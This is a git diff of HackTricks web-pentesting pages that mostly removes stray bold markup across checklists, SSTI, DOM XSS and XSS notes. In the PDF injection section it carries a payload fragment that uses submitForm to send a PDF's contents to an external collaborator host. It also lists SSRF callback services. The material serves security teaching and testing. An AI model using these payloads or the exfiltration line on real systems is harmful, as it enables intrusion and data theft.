](second-order-injection-sqlmap.md)**about how to perform simple and complex second order injections with sqlmap.** ## Customizing Injection diff --git a/pentesting-web/sql-injection/sqlmap/second-order-injection-sqlmap.md b/pentesting-web/sql-injection/sqlmap/second-order-injection-sqlmap.md index 0436cab9..fff249f5 100644 --- a/pentesting-web/sql-injection/sqlmap/second-order-injection-sqlmap.md +++ b/pentesting-web/sql-injection/sqlmap/second-order-injection-sqlmap.md @@ -1,7 +1,7 @@ # Second Order Injection - SQLMap **SQLMap can exploit Second Order SQLis.**\ -****You need to provide: +You need to provide: * The **request** where the **sqlinjection payload** is going to be saved * The **request** where the **payload** will be **executed** diff --git a/pentesting-web/ssrf-server-side-request-forgery/README.md b/pentesting-web/ssrf-server-side-request-forgery/README.md index 5bd02715..f73c6bdf 100644 --- a/pentesting-web/ssrf-server-side-request-forgery/README.md +++ b/pentesting-web/ssrf-server-side-request-forgery/README.md @@ -10,10 +10,10 @@ The first thing you need to do is to capture a SSRF interaction provoked by you. * **Burpcollab** * [**pingb**](http://pingb.in) -* ****[**canarytokens**](https://canarytokens.org/generate#)**** -* ****[**interractsh**](https://github.com/projectdiscovery/interactsh)**** -* ****[**http://webhook.site**](http://webhook.site)**** -* [**https://github.com/teknogeek/ssrf-sheriff**](https://github.com/teknogeek/ssrf-sheriff)**** +* [**canarytokens**](https://canarytokens.org/generate#) +* [**interractsh**](https://github.com/projectdiscovery/interactsh) +* [**http://webhook.site**](http://webhook.site) +* [**https://github.com/teknogeek/ssrf-sheriff**](https://github.com/teknogeek/ssrf-sheriff) ## Whitelisted Domains Bypass @@ -224,7 +224,7 @@ Several known platforms contains or has contained SSRF vulnerabilities, check th ## Tools -### ****[**SSRFMap**](https://github.com/swisskyrepo/SSRFmap)**** +### [**SSRFMap**](https://github.com/swisskyrepo/SSRFmap) Tool to detect and exploit SSRF vulnerabilities diff --git a/pentesting-web/ssti-server-side-template-injection/README.md b/pentesting-web/ssti-server-side-template-injection/README.md index c618ec76..0b96a229 100644 --- a/pentesting-web/ssti-server-side-template-injection/README.md +++ b/pentesting-web/ssti-server-side-template-injection/README.md @@ -5,11 +5,11 @@ Do you want to have access the **latest version of Hacktricks and PEASS**, obtain a **PDF copy of Hacktricks**, and more? Discover the **brand new** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop?frequency=one-time) **for individuals and companies.** -Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)**** +Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)**** +Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -**Join the** [**💬**](https://emojipedia.org/speech-balloon/) **** [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) **** or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** {% endhint %} @@ -354,7 +354,7 @@ Payload: {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstanc ### Expression Language - EL (Java) * `${"aaaa"}` - "aaaa" -* `${99999+1}` - 100000. +* `${99999+1}` - 100000. * `#{7*7}` - 49 * `${{7*7}}` - 49 * `${{request}}, ${{session}}, {{faceContext}}` @@ -871,7 +871,7 @@ The way to confirm that the template engine used in the backed is Go you can use #### XSS exploitation -If the server is **using the text/template** package, XSS is very easy to achieve by **simply** providing your **payload** as input. However, that is **not the case with html/template** as itHTMLencodes the response: `{{""}}` **** --> `<script>alert(1)</script>` +If the server is **using the text/template** package, XSS is very easy to achieve by **simply** providing your **payload** as input. However, that is **not the case with html/template** as itHTMLencodes the response: `{{""}}` --> `<script>alert(1)</script>` However, Go allows to **DEFINE** a whole **template** and then **later call it**. The payload will be something like:\ `{{define "T1"}}{{end}} {{template "T1"}}` @@ -890,7 +890,7 @@ func (p Person) Secret (test string) string { } ``` -#### More information +#### More information * [https://blog.takemyhand.xyz/2020/05/ssti-breaking-gos-template-engine-to.html](https://blog.takemyhand.xyz/2020/05/ssti-breaking-gos-template-engine-to.html) * [https://www.onsecurity.io/blog/go-ssti-method-research/](https://www.onsecurity.io/blog/go-ssti-method-research/) diff --git a/pentesting-web/ssti-server-side-template-injection/el-expression-language.md b/pentesting-web/ssti-server-side-template-injection/el-expression-language.md index fe5e17ac..25ebfed3 100644 --- a/pentesting-web/ssti-server-side-template-injection/el-expression-language.md +++ b/pentesting-web/ssti-server-side-template-injection/el-expression-language.md @@ -24,9 +24,9 @@ Depending on the **EL version** some **features** might be **On** or **Off** and Download from the [**Maven**](https://mvnrepository.com) repository the jar files: -* `commons-lang3-3.9.jar` +* `commons-lang3-3.9.jar` * `spring-core-5.2.1.RELEASE.jar` -* `commons-logging-1.2.jar` +* `commons-logging-1.2.jar` * `spring-expression-5.2.1.RELEASE.jar` And create a the following `Main.java` file: diff --git a/pentesting-web/unicode-normalization-vulnerability.md b/pentesting-web/unicode-normalization-vulnerability.md index 6ea72a30..2d4c84e5 100644 --- a/pentesting-web/unicode-normalization-vulnerability.md +++ b/pentesting-web/unicode-normalization-vulnerability.md @@ -84,6 +84,6 @@ Notice that for example the first Unicode character purposed can be sent as: `%e **Other references:** -* ****[**https://labs.spotify.com/2013/06/18/creative-usernames/**](https://labs.spotify.com/2013/06/18/creative-usernames/)**** -* ****[**https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work**](https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work)**** -* ****[**https://jlajara.gitlab.io/posts/2020/02/19/Bypass\_WAF\_Unicode.html**](https://jlajara.gitlab.io/posts/2020/02/19/Bypass\_WAF\_Unicode.html)**** +* [**https://labs.spotify.com/2013/06/18/creative-usernames/**](https://labs.spotify.com/2013/06/18/creative-usernames/) +* [**https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work**](https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work) +* [**https://jlajara.gitlab.io/posts/2020/02/19/Bypass\_WAF\_Unicode.html**](https://jlajara.gitlab.io/posts/2020/02/19/Bypass\_WAF\_Unicode.html) diff --git a/pentesting-web/web-vulnerabilities-methodology.md b/pentesting-web/web-vulnerabilities-methodology.md index 0ea55023..0e61abcf 100644 --- a/pentesting-web/web-vulnerabilities-methodology.md +++ b/pentesting-web/web-vulnerabilities-methodology.md @@ -8,40 +8,40 @@ In every pentest web there is **several hidden and obvious places that might be Nowadays **web** **applications** usually **uses** some kind of **intermediary** **proxies**, those may be (ab)used to exploit vulnerabilities. These vulnerabilities need a vulnerable proxy to be in place, but they usually also need some extra vulnerability in the backend. {% endhint %} -* [ ] [**Abusing hop-by-hop headers**](abusing-hop-by-hop-headers.md)**** -* [ ] ****[**Cache Poisoning/Cache Deception**](cache-deception.md)**** -* [ ] ****[**HTTP Request Smuggling**](http-request-smuggling/)**** -* [ ] ****[**H2C Smuggling**](h2c-smuggling.md)**** -* [ ] ****[**Server Side Inclusion/Edge Side Inclusion**](server-side-inclusion-edge-side-inclusion-injection.md)**** -* [ ] ****[**Uncovering Cloudflare**](../pentesting/pentesting-web/uncovering-cloudflare.md)**** -* [ ] ****[**XSLT Server Side Injection**](xslt-server-side-injection-extensible-stylesheet-languaje-transformations.md)**** +* [ ] [**Abusing hop-by-hop headers**](abusing-hop-by-hop-headers.md) +* [ ] [**Cache Poisoning/Cache Deception**](cache-deception.md) +* [ ] [**HTTP Request Smuggling**](http-request-smuggling/) +* [ ] [**H2C Smuggling**](h2c-smuggling.md) +* [ ] [**Server Side Inclusion/Edge Side Inclusion**](server-side-inclusion-edge-side-inclusion-injection.md) +* [ ] [**Uncovering Cloudflare**](../pentesting/pentesting-web/uncovering-cloudflare.md) +* [ ] [**XSLT Server Side Injection**](xslt-server-side-injection-extensible-stylesheet-languaje-transformations.md) ## **User input** {% hint style="info" %} - Most of the web applications will **allow users to input some data that will be processed later.**\ -****Depending on the structure of the data the server is expecting some vulnerabilities may or may not apply. +Most of the web applications will **allow users to input some data that will be processed later.**\ +Depending on the structure of the data the server is expecting some vulnerabilities may or may not apply. {% endhint %} ### **Reflected Values** If the introduced data may somehow being reflected in the response, the page might be vulnerable to several issues. -* [ ] [**Client Side Template Injection**](client-side-template-injection-csti.md)**** -* [ ] ****[**Command Injection**](command-injection.md)**** -* [ ] ****[**CRLF**](crlf-0d-0a.md)**** -* [ ] ****[**Dangling Markup**](dangling-markup-html-scriptless-injection.md)**** -* [ ] [**File Inclusion/Path Traversal**](file-inclusion/)**** -* [ ] [**Open Redirect**](open-redirect.md)**** -* [ ] ****[**Prototype Pollution to XSS**](deserialization/nodejs-proto-prototype-pollution/#client-side-prototype-pollution-to-xss)**** -* [ ] [**Server Side Inclusion/Edge Side Inclusion**](server-side-inclusion-edge-side-inclusion-injection.md)**** -* [ ] [**Server Side Request Forgery**](ssrf-server-side-request-forgery/)**** -* [ ] [**Server Side Template Injection**](ssti-server-side-template-injection/)**** -* [ ] [**Reverse Tab Nabbing**](reverse-tab-nabbing.md)**** -* [ ] [**XSLT Server Side Injection**](xslt-server-side-injection-extensible-stylesheet-languaje-transformations.md)**** -* [ ] [**XSS**](xss-cross-site-scripting/)**** -* [ ] ****[**XSSI**](xssi-cross-site-script-inclusion.md)**** -* [ ] ****[**XS-Search**](xs-search.md)**** +* [ ] [**Client Side Template Injection**](client-side-template-injection-csti.md) +* [ ] [**Command Injection**](command-injection.md) +* [ ] [**CRLF**](crlf-0d-0a.md) +* [ ] [**Dangling Markup**](dangling-markup-html-scriptless-injection.md) +* [ ] [**File Inclusion/Path Traversal**](file-inclusion/) +* [ ] [**Open Redirect**](open-redirect.md) +* [ ] [**Prototype Pollution to XSS**](deserialization/nodejs-proto-prototype-pollution/#client-side-prototype-pollution-to-xss) +* [ ] [**Server Side Inclusion/Edge Side Inclusion**](server-side-inclusion-edge-side-inclusion-injection.md) +* [ ] [**Server Side Request Forgery**](ssrf-server-side-request-forgery/) +* [ ] [**Server Side Template Injection**](ssti-server-side-template-injection/) +* [ ] [**Reverse Tab Nabbing**](reverse-tab-nabbing.md) +* [ ] [**XSLT Server Side Injection**](xslt-server-side-injection-extensible-stylesheet-languaje-transformations.md) +* [ ] [**XSS**](xss-cross-site-scripting/) +* [ ] [**XSSI**](xssi-cross-site-script-inclusion.md) +* [ ] [**XS-Search**](xs-search.md) Some of the mentioned vulnerabilities requires special conditions, others just require the content to be reflected. You can find some interesting polygloths to test quickly the vulnerabilities in: @@ -53,52 +53,52 @@ Some of the mentioned vulnerabilities requires special conditions, others just r If the functionality may be used to search some kind of data inside the backend, maybe you can (ab)use it to search arbitrary data. -* [ ] [**File Inclusion/Path Traversal**](file-inclusion/)**** -* [ ] ****[**NoSQL Injection**](nosql-injection.md)**** -* [ ] ****[**LDAP Injection**](ldap-injection.md)**** +* [ ] [**File Inclusion/Path Traversal**](file-inclusion/) +* [ ] [**NoSQL Injection**](nosql-injection.md) +* [ ] [**LDAP Injection**](ldap-injection.md) * [ ] [**ReDoS**](regular-expression-denial-of-service-redos.md) -* [ ] [**SQL Injection**](sql-injection/)**** -* [ ] [**XAPTH Injection**](xpath-injection.md)**** +* [ ] [**SQL Injection**](sql-injection/) +* [ ] [**XAPTH Injection**](xpath-injection.md) ### **Forms, WebSockets and PostMsgs** When websocket, post message or a form allows user to perform actions vulnerabilities may arise. -* [ ] [**Cross Site Request Forgery**](csrf-cross-site-request-forgery.md)**** -* [ ] [**Cross-site WebSocket hijacking (CSWSH)**](cross-site-websocket-hijacking-cswsh.md)**** -* [ ] ****[**PostMessage Vulnerabilities**](postmessage-vulnerabilities.md)**** +* [ ] [**Cross Site Request Forgery**](csrf-cross-site-request-forgery.md) +* [ ] [**Cross-site WebSocket hijacking (CSWSH)**](cross-site-websocket-hijacking-cswsh.md) +* [ ] [**PostMessage Vulnerabilities**](postmessage-vulnerabilities.md) ### **HTTP Headers** Depending on the HTTP headers given by the web server some vulnerabilities might be present. -* [ ] [**Clickjacking**](clickjacking.md)**** -* [ ] ****[**Content Security Policy bypass**](content-security-policy-csp-bypass.md)**** -* [ ] ****[**Cookies Hacking**](hacking-with-cookies/)**** -* [ ] ****[**CORS - Misconfigurations & Bypass**](cors-bypass.md)**** +* [ ] [**Clickjacking**](clickjacking.md) +* [ ] [**Content Security Policy bypass**](content-security-policy-csp-bypass.md) +* [ ] [**Cookies Hacking**](hacking-with-cookies/) +* [ ] [**CORS - Misconfigurations & Bypass**](cors-bypass.md) ### **Bypasses** There are several specific functionalities were some workarounds might be useful to bypass them -* [ ] ****[**2FA/OPT Bypass**](2fa-bypass.md)**** -* [ ] ****[**Bypass Payment Process**](bypass-payment-process.md)**** -* [ ] ****[**Captcha Bypass**](captcha-bypass.md)**** -* [ ] ****[**Login Bypass**](login-bypass/)**** -* [ ] ****[**Race Condition**](race-condition.md)**** -* [ ] ****[**Rate Limit Bypass**](rate-limit-bypass.md)**** -* [ ] ****[**Reset Forgotten Password Bypass**](reset-password.md)**** -* [ ] ****[**Registration Vulnerabilities**](registration-vulnerabilities.md)**** +* [ ] [**2FA/OPT Bypass**](2fa-bypass.md) +* [ ] [**Bypass Payment Process**](bypass-payment-process.md) +* [ ] [**Captcha Bypass**](captcha-bypass.md) +* [ ] [**Login Bypass**](login-bypass/) +* [ ] [**Race Condition**](race-condition.md) +* [ ] [**Rate Limit Bypass**](rate-limit-bypass.md) +* [ ] [**Reset Forgotten Password Bypass**](reset-password.md) +* [ ] [**Registration Vulnerabilities**](registration-vulnerabilities.md) ### **Structured objects / Specific functionalities** Some functionalities will require the **data to be structured on a very specific format** (like a language serialized object or a XML). Therefore, it's more easy to identify is the application might be vulnerable as it needs to be processing that kind of data.\ -Some **specific functionalities** my be also vulnerable if a **specific format of the input is used** (like Email Header Injections). +Some **specific functionalities** my be also vulnerable if a **specific format of the input is used** (like Email Header Injections). -* [ ] ****[**Deserialization**](deserialization/)**** -* [ ] ****[**Email Header Injection**](email-header-injection.md)**** -* [ ] ****[**JWT Vulnerabilities**](hacking-jwt-json-web-tokens.md)**** -* [ ] [**XML External Entity**](xxe-xee-xml-external-entity.md)**** +* [ ] [**Deserialization**](deserialization/) +* [ ] [**Email Header Injection**](email-header-injection.md) +* [ ] [**JWT Vulnerabilities**](hacking-jwt-json-web-tokens.md) +* [ ] [**XML External Entity**](xxe-xee-xml-external-entity.md) ### Files @@ -106,21 +106,21 @@ Functionalities that allow to upload files might be vulnerable to several issues Functionalities that generates files including user input might execute unexpected code.\ Users that open files uploaded by users or automatically generated including user input might be compromised. -* [ ] [**File Upload**](file-upload/)**** -* [ ] ****[**Formula Injection**](formula-injection.md)**** -* [ ] ****[**PDF Injection**](xss-cross-site-scripting/pdf-injection.md)**** -* [ ] ****[**Server Side XSS**](xss-cross-site-scripting/server-side-xss-dynamic-pdf.md)**** +* [ ] [**File Upload**](file-upload/) +* [ ] [**Formula Injection**](formula-injection.md) +* [ ] [**PDF Injection**](xss-cross-site-scripting/pdf-injection.md) +* [ ] [**Server Side XSS**](xss-cross-site-scripting/server-side-xss-dynamic-pdf.md) ### **External Identity Management** -* [ ] ****[**OAUTH to Account takeover**](oauth-to-account-takeover.md)**** -* [ ] ****[**SAML Attacks**](saml-attacks/)**** +* [ ] [**OAUTH to Account takeover**](oauth-to-account-takeover.md) +* [ ] [**SAML Attacks**](saml-attacks/) ### **Other Helpful Vulnerabilities** This vulnerabilities might help to exploit other vulnerabilities. -* [ ] [**Domain/Subdomain takeover**](domain-subdomain-takeover.md)**** -* [ ] ****[**IDOR**](idor.md)**** -* [ ] [**Parameter Pollution**](parameter-pollution.md)**** -* [ ] ****[**Unicode Normalization vulnerability**](unicode-normalization-vulnerability.md)**** +* [ ] [**Domain/Subdomain takeover**](domain-subdomain-takeover.md) +* [ ] [**IDOR**](idor.md) +* [ ] [**Parameter Pollution**](parameter-pollution.md) +* [ ] [**Unicode Normalization vulnerability**](unicode-normalization-vulnerability.md) diff --git a/pentesting-web/xss-cross-site-scripting/README.md b/pentesting-web/xss-cross-site-scripting/README.md index 61a5dac8..0b2988ba 100644 --- a/pentesting-web/xss-cross-site-scripting/README.md +++ b/pentesting-web/xss-cross-site-scripting/README.md @@ -53,7 +53,7 @@ If your input is reflected inside the value of the attribute of a tag you could ### Inside JavaScript code -In this case your input is reflected between **``** tags of a HTML page, inside a \*\*`.js`\*\*file or inside an attribute using **`javascript:`** protocol: +In this case your input is reflected between **``** tags of a HTML page, inside a **`.js`**file or inside an attribute using **`javascript:`** protocol: * If reflected between **``** tags, even if your input if inside any kind of quotes, you can try to inject `` and escape from this context. This works because the **browser will first parse the HTML tags** and then the content, therefore, it won't notice that your injected `` tag is inside the HTML code. * If reflected **inside a JS string** and the last trick isn't working you would need to **exit** the string, **execute** your code and **reconstruct** the JS code (if there is any error, it won't be executed: @@ -91,7 +91,7 @@ Some **examples**: When your input is reflected **inside the HTML page** or you can escape and inject HTML code in this context the **first** thing you need to do if check if you can abuse `<` to create new tags: Just try to **reflect** that **char** and check if it's being **HTML encoded** or **deleted** of if it is **reflected without changes**. **Only in the last case you will be able to exploit this case**.\ For this cases also **keep in mind** [**Client Side Template Injection**](../client-side-template-injection-csti.md)**.**\ -_**Note: A HTML comment can be closed using\*\*\*\***** ****`-->`**** ****or \*\*\*\*****`--!>`**_ +_**Note: A HTML comment can be closed using `-->` or `--!>`**_ In this case and if no black/whitelisting is used, you could use payloads like: @@ -315,7 +315,7 @@ _**In this case the HTML encoding and the Unicode encoding trick from the previo ``` -Moreover, there is another **nice trick** for these cases\*\*: Even if your input inside `javascript:...` is being URL encoded, it will be URL decoded before it's executed.\*\* So, if you need to **escape** from the **string** using a **single quote** and you see that **it's being URL encoded**, remember that **it doesn't matter,** it will be **interpreted** as a **single quote** during the **execution** time. +Moreover, there is another **nice trick** for these cases**: Even if your input inside `javascript:...` is being URL encoded, it will be URL decoded before it's executed.** So, if you need to **escape** from the **string** using a **single quote** and you see that **it's being URL encoded**, remember that **it doesn't matter,** it will be **interpreted** as a **single quote** during the **execution** time. ```javascript '-alert(1)-' diff --git a/pentesting-web/xss-cross-site-scripting/dom-xss.md b/pentesting-web/xss-cross-site-scripting/dom-xss.md index 0ed17e7a..66084c81 100644 --- a/pentesting-web/xss-cross-site-scripting/dom-xss.md +++ b/pentesting-web/xss-cross-site-scripting/dom-xss.md @@ -13,7 +13,7 @@ Fundamentally, DOM-based vulnerabilities arise when a website **passes data from a source to a sink**, which then handles the data in an unsafe way in the context of the client's session. {% hint style="info" %} -**You can find a more updated list of sources and sinks in** [**https://github.com/wisec/domxsswiki/wiki**](https://github.com/wisec/domxsswiki/wiki)**** +**You can find a more updated list of sources and sinks in** [**https://github.com/wisec/domxsswiki/wiki**](https://github.com/wisec/domxsswiki/wiki) {% endhint %} **Common sources:** @@ -37,7 +37,7 @@ Database **Common Sinks:** -| ****[**Open Redirect**](dom-xss.md#open-redirect)**** | [**Javascript Injection**](dom-xss.md#javascript-injection)**** | [**DOM-data manipulation**](dom-xss.md#dom-data-manipulation)**** | **jQuery** | +| [**Open Redirect**](dom-xss.md#open-redirect) | [**Javascript Injection**](dom-xss.md#javascript-injection) | [**DOM-data manipulation**](dom-xss.md#dom-data-manipulation) | **jQuery** | | ---------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------- | ----------------------------------------------------------------- | ------------------------------------------------------------------------------ | | `location` | `eval()` | `scriptElement.src` | `add()` | | `location.host` | `Function() constructor` | `scriptElement.text` | `after()` | @@ -49,27 +49,27 @@ Database | `location.assign()` | `msSetImmediate()` | `someDOMElement.textContent` | `html()` | | `location.replace()` | `range.createContextualFragment()` | `someDOMElement.innerText` | `prepend()` | | `open()` | `crypto.generateCRMFRequest()` | `someDOMElement.outerText` | `replaceAll()` | -| `domElem.srcdoc` | **``**[**Local file-path manipulation**](dom-xss.md#local-file-path-manipulation)**** | `someDOMElement.value` | `replaceWith()` | +| `domElem.srcdoc` | **``**[**Local file-path manipulation**](dom-xss.md#local-file-path-manipulation) | `someDOMElement.value` | `replaceWith()` | | `XMLHttpRequest.open()` | `FileReader.readAsArrayBuffer()` | `someDOMElement.name` | `wrap()` | | `XMLHttpRequest.send()` | `FileReader.readAsBinaryString()` | `someDOMElement.target` | `wrapInner()` | | `jQuery.ajax()` | `FileReader.readAsDataURL()` | `someDOMElement.method` | `wrapAll()` | | `$.ajax()` | `FileReader.readAsText()` | `someDOMElement.type` | `has()` | -| **``**[**Ajax request manipulation**](dom-xss.md#ajax-request-manipulation)**** | `FileReader.readAsFile()` | `someDOMElement.backgroundImage` | `constructor()` | +| **``**[**Ajax request manipulation**](dom-xss.md#ajax-request-manipulation) | `FileReader.readAsFile()` | `someDOMElement.backgroundImage` | `constructor()` | | `XMLHttpRequest.setRequestHeader()` | `FileReader.root.getFile()` | `someDOMElement.cssText` | `init()` | | `XMLHttpRequest.open()` | `FileReader.root.getFile()` | `someDOMElement.codebase` | `index()` | -| `XMLHttpRequest.send()` | ****[**Link manipulation**](dom-xss.md#link-manipulation)**** | `someDOMElement.innerHTML` | `jQuery.parseHTML()` | +| `XMLHttpRequest.send()` | [**Link manipulation**](dom-xss.md#link-manipulation) | `someDOMElement.innerHTML` | `jQuery.parseHTML()` | | `jQuery.globalEval()` | `someDOMElement.href` | `someDOMElement.outerHTML` | `$.parseHTML()` | -| `$.globalEval()` | `someDOMElement.src` | `someDOMElement.insertAdjacentHTML` | ****[**Client-side JSON injection**](dom-xss.md#client-side-sql-injection)**** | -| **``**[**HTML5-storage manipulation**](dom-xss.md#html-5-storage-manipulation)**** | `someDOMElement.action` | `someDOMElement.onevent` | `JSON.parse()` | -| `sessionStorage.setItem()` | [**XPath injection**](dom-xss.md#xpath-injection)**** | `document.write()` | `jQuery.parseJSON()` | +| `$.globalEval()` | `someDOMElement.src` | `someDOMElement.insertAdjacentHTML` | [**Client-side JSON injection**](dom-xss.md#client-side-sql-injection) | +| **``**[**HTML5-storage manipulation**](dom-xss.md#html-5-storage-manipulation) | `someDOMElement.action` | `someDOMElement.onevent` | `JSON.parse()` | +| `sessionStorage.setItem()` | [**XPath injection**](dom-xss.md#xpath-injection) | `document.write()` | `jQuery.parseJSON()` | | `localStorage.setItem()` | `document.evaluate()` | `document.writeln()` | `$.parseJSON()` | -| **``**[**`Denial of Service`**](dom-xss.md#denial-of-service)**``** | `someDOMElement.evaluate()` | `document.title` | **``**[**Cookie manipulation**](dom-xss.md#cookie-manipulation)**** | -| `requestFileSystem()` | **``**[**Document-domain manipulation**](dom-xss.md#document-domain-manipulation)**** | `document.implementation.createHTMLDocument()` | `document.cookie` | -| `RegExp()` | `document.domain` | `history.pushState()` | ****[**WebSocket-URL poisoning**](dom-xss.md#websocket-url-poisoning)**** | -| ****[**Client-Side SQl injection**](dom-xss.md#client-side-sql-injection)**** | ****[**Web-message manipulation**](dom-xss.md#web-message-manipulation)**** | `history.replaceState()` | `WebSocket` | +| **``**[**`Denial of Service`**](dom-xss.md#denial-of-service)**``** | `someDOMElement.evaluate()` | `document.title` | **``**[**Cookie manipulation**](dom-xss.md#cookie-manipulation) | +| `requestFileSystem()` | **``**[**Document-domain manipulation**](dom-xss.md#document-domain-manipulation) | `document.implementation.createHTMLDocument()` | `document.cookie` | +| `RegExp()` | `document.domain` | `history.pushState()` | [**WebSocket-URL poisoning**](dom-xss.md#websocket-url-poisoning) | +| [**Client-Side SQl injection**](dom-xss.md#client-side-sql-injection) | [**Web-message manipulation**](dom-xss.md#web-message-manipulation) | `history.replaceState()` | `WebSocket` | | `executeSql()` | `postMessage()` | `` | `` | - The **`innerHTML`** sink doesn't accept `script` elements on any modern browser, nor will `svg onload` events fire. This means you will need to use alternative elements like `img` or `iframe`. +The **`innerHTML`** sink doesn't accept `script` elements on any modern browser, nor will `svg onload` events fire. This means you will need to use alternative elements like `img` or `iframe`. This kind of XSS is probably the **hardest to find**, as you need to look inside the JS code, see if it's **using** any object whose **value you control**, and in that case, see if there is **any way to abuse** it to execute arbitrary JS. @@ -155,7 +155,7 @@ From: [https://portswigger.net/web-security/dom-based/document-domain-manipulati Document-domain manipulation vulnerabilities arise when a script uses **attacker-controllable data to set** the **`document.domain`** property. - The `document.domain` property is used by browsers in their **enforcement** of the **same origin policy**. If **two pages** from **different** origins explicitly set the **same `document.domain`** value, then those two pages can **interact in unrestricted ways**.\ +The `document.domain` property is used by browsers in their **enforcement** of the **same origin policy**. If **two pages** from **different** origins explicitly set the **same `document.domain`** value, then those two pages can **interact in unrestricted ways**.\ Browsers **generally enforce some restrictions** on the values that can be assigned to `document.domain`, and may prevent the use of completely different values than the actual origin of the page. **But this doesn't occur always** and they usually **allow to use child** or **parent** domains. #### Sinks @@ -174,7 +174,7 @@ WebSocket-URL poisoning occurs when a script uses **controllable data as the tar #### Sinks - The `WebSocket` constructor can lead to WebSocket-URL poisoning vulnerabilities. +The `WebSocket` constructor can lead to WebSocket-URL poisoning vulnerabilities. ### Link manipulation diff --git a/pentesting-web/xss-cross-site-scripting/pdf-injection.md b/pentesting-web/xss-cross-site-scripting/pdf-injection.md index 7ee49311..a77dd93b 100644 --- a/pentesting-web/xss-cross-site-scripting/pdf-injection.md +++ b/pentesting-web/xss-cross-site-scripting/pdf-injection.md @@ -2,35 +2,35 @@ **If your input is being reflected inside a PDF file, you can try to inject PDF data to execute JavaScript or steal the PDF content.** -The following information was taken from [**https://portswigger.net/research/portable-data-exfiltration**](https://portswigger.net/research/portable-data-exfiltration)**** +The following information was taken from [**https://portswigger.net/research/portable-data-exfiltration**](https://portswigger.net/research/portable-data-exfiltration) ### PDF-Lib This time, I was using [PDFLib](https://pdf-lib.js.org). I took some time to use the library to create an annotation and see if I could inject a closing parenthesis into the annotation URI - and it worked! The sample vulnerable code I used to generate the annotation code was: `...` \ - `A: {`\ - `Type: 'Action',`\ - `S: 'URI',`\ - ``URI: PDFString.of(`injection)`),``\ - `}`\ - `})`\ - `...` +`A: {`\ + `Type: 'Action',`\ + `S: 'URI',`\ + ``URI: PDFString.of(`injection)`),``\ + `}`\ + `})`\ +`...` [Full code:](https://github.com/PortSwigger/portable-data-exfiltration/blob/main/PDF-research-samples/pdf-lib/first-injection/test.js) How did I know the injection was successful? The PDF would render correctly unless I injected a closing parenthesis. This proved that the closing parenthesis was breaking out of the string and causing invalid PDF code. Breaking the PDF was nice, but I needed to ensure I could execute JavaScript of course. I looked at the rendered PDF code and noticed the output was being encoded using the FlateDecode filter. I wrote a little script to deflate the block and the output of the annotation section looked like this:`<<`\ - `/Type /Annot`\ - `/Subtype /Link`\ - `/Rect [ 50 746.89 320 711.89 ]`\ - `/Border [ 0 0 2 ]`\ - `/C [ 0 0 1 ]`\ - `/A <<`\ - `/Type /Action`\ - `/S /URI`\ - `/URI (injection))`\ - `>>`\ - `>>` +`/Type /Annot`\ +`/Subtype /Link`\ +`/Rect [ 50 746.89 320 711.89 ]`\ +`/Border [ 0 0 2 ]`\ +`/C [ 0 0 1 ]`\ +`/A <<`\ +`/Type /Action`\ +`/S /URI`\ +`/URI (injection))`\ +`>>`\ +`>>` As you can clearly see, the injection string is closing the text boundary with a closing parenthesis, which leaves an existing closing parenthesis that causes the PDF to be rendered incorrectly: @@ -41,9 +41,9 @@ Great, so I could break the rendering of the PDF, now what? I needed to come up Just like how XSS vectors depend on the browser's parsing, PDF injection exploitability can depend on the PDF renderer. I decided to start by targeting Acrobat because I thought the vectors were less likely to work in Chrome. Two things I noticed: 1) You could inject additional annotation actions and 2) if you repair the existing closing parenthesis then the PDF would render. After some experimentation, I came up with a nice payload that injected an additional annotation action, executed JavaScript, and repaired the closing parenthesis:`/blah)>>/A<>/>>(` First I break out of the parenthesis, then break out of the dictionary using >> before starting a new annotation dictionary. The /S/JavaScript makes the annotation JavaScript-based and the /JS is where the JavaScript is stored. Inside the parentheses is our actual JavaScript. Note that you don't have to escape the parentheses if they're balanced. Finally, I add the type of annotation, finish the dictionary, and repair the closing parenthesis. This was so cool; I could craft an injection that executed JavaScript but so what, right? You can execute JavaScript but you don't have access to the DOM, so you can't read cookies. Then James popped up and suggested stealing the contents of the PDF from the injection. I started looking at ways to get the contents of a PDF. In Acrobat, I discovered that you can use JavaScript to submit forms without any user interaction! Looking at the spec for the JavaScript API, it was pretty straightforward to modify the base injection and add some JavaScript that would send the entire contents of the PDF code to an external server in a POST request:`/blah)>>/A<>/>>(` +`this.submitForm({`\ +`cURL: 'https://your-id.burpcollaborator.net',cSubmitAs: 'PDF'}))`\ +`/Type/Action>>/>>(` The alert is not needed; I just added it to prove the injection was executing JavaScript. @@ -52,32 +52,32 @@ Next, just for fun, I looked at stealing the contents of the PDF without using J To set a flag, you first need to look up its bit position (table 237 of the [PDF specification](https://www.adobe.com/content/dam/acom/en/devnet/pdf/pdfs/PDF32000\_2008.pdf)). In this case, we want to set the SubmitPDF flag. As this is controlled by the 9th bit, you just need to count 9 bits from the right:`0b00000100000000` If you evaluate this with JavaScript, this results in the decimal value 256. In other words, setting the Flags entry to 256 will enable the SubmitPDF flag, which causes 